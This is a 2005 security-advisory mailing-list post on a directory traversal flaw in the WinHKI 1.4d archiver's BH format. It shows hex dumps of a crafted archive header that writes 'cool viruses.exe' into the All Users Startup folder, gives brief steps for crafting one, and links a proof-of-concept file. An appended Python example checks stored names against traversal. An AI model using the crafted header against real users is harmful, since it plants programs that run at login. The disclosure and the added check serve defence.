[VulnWatch] WinHKI - BH File Directory Transversal

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/06/05

  • Next message: Rafel Ivgi, The-Insider: "[VulnWatch] WinHKI - CAB File Directory Transversal"
    Date: Thu, 06 Jan 2005 10:19:50 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: BH File Directory Transversal
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiver which supports BH, CAB, HKI, JAR, LHA, TAR and GZ
    compression.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal BH compressed file header:

    00000000 484B 4901 1441 0000 FD00 3973 7831 8D34 HKI..A....9sx1.4
    00000010 3741 7800 0000 1B00 0000 0500 0000 302E 7Ax...........0.
    00000020 6874 6D00 0010 0078 0000 001B 0000 008D htm....x........
    00000030 3437 4101 0000 0001 06FF FF00 0000 0000 47A.............

    In the following dump, we can see how easy it is to change the path
    to anywhere we want, including the All Users Startup folder.

    00000000 484B 4901 1441 0000 FD00 6C8C 9031 066A HKI..A....l..1.j
    00000010 8E05 F600 0000 D300 0000 4000 0000 633A ..........@...c:
    00000020 5C64 6F63 756D 657E 315C 616C 6C75 7365 \docume~1\alluse
    00000030 7E31 5C73 7461 7274 6D7E 315C 7072 6F67 ~1\startm~1\prog
    00000040 7261 6D73 5C73 7461 7274 7570 5C63 6F6F rams\startup\coo
    00000050 6C20 2076 6972 7573 6573 2E65 7865 0000 l  viruses.exe..
    00000060 1000 F600 0000 D300 0000 066A 8E05 0100 ...........j....

    All we need to do is cab compress (using WinHKI) a file with a long
    name/path and change the path specified inside the file to whatever
    we want. Using any hex editor such as HexWorkshop, just add anything
    to the filename.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.deep-ice.com/poc.bh

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Scripts and Codes will make me D.O.S , but they will never HACK me."
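
The check an extractor needs before writing each entry, as an added example that is not part of the original advisory or WinHKI's code: it reads the stored name from the two dumps above and refuses any name that would land outside the extraction directory. The field layout (4-byte little-endian name length at offset 0x1A, name at 0x1E) is inferred from those two dumps only; `stored_name`, `safe_target` and `C:\extract` are hypothetical names.

```python
import ntpath
import struct
from typing import Optional

# Bytes copied from the advisory's two hex dumps (first entry header only).
NORMAL = bytes.fromhex("""
    484B 4901 1441 0000 FD00 3973 7831 8D34 3741 7800 0000 1B00 0000 0500 0000 302E
    6874 6D00 0010 0078 0000 001B 0000 008D 3437 4101 0000 0001 06FF FF00 0000 0000
""")
MODIFIED = bytes.fromhex("""
    484B 4901 1441 0000 FD00 6C8C 9031 066A 8E05 F600 0000 D300 0000 4000 0000 633A
    5C64 6F63 756D 657E 315C 616C 6C75 7365 7E31 5C73 7461 7274 6D7E 315C 7072 6F67
    7261 6D73 5C73 7461 7274 7570 5C63 6F6F 6C20 2076 6972 7573 6573 2E65 7865 0000
    1000 F600 0000 D300 0000 066A 8E05 0100
""")

NAME_LEN_OFF, NAME_OFF = 0x1A, 0x1E  # assumption: inferred from the dumps


def stored_name(entry: bytes) -> str:
    """Return the file name stored in a BH entry header."""
    if entry[:3] != b"HKI":
        raise ValueError("not a BH/HKI entry")
    (length,) = struct.unpack_from("<I", entry, NAME_LEN_OFF)
    name = entry[NAME_OFF:NAME_OFF + length]
    if len(name) != length:
        raise ValueError("truncated name field")
    return name.decode("latin-1")


def safe_target(dest_root: str, name: str) -> Optional[str]:
    """Return the path to write to, or None if the name escapes dest_root."""
    drive, rest = ntpath.splitdrive(name)       # catches "c:" and UNC prefixes
    if drive or rest.startswith(("\\", "/")):   # absolute or rooted name
        return None
    if ".." in rest.replace("/", "\\").split("\\"):
        return None
    root = ntpath.normpath(dest_root)
    target = ntpath.normpath(ntpath.join(root, rest))
    # Final containment check on the normalised result.
    if ntpath.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    for label, blob in (("normal", NORMAL), ("modified", MODIFIED)):
        name = stored_name(blob)
        print(label, repr(name), "->", safe_target(r"C:\extract", name))
```

`ntpath` is used instead of `os.path` so the Windows path rules apply wherever the check runs.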

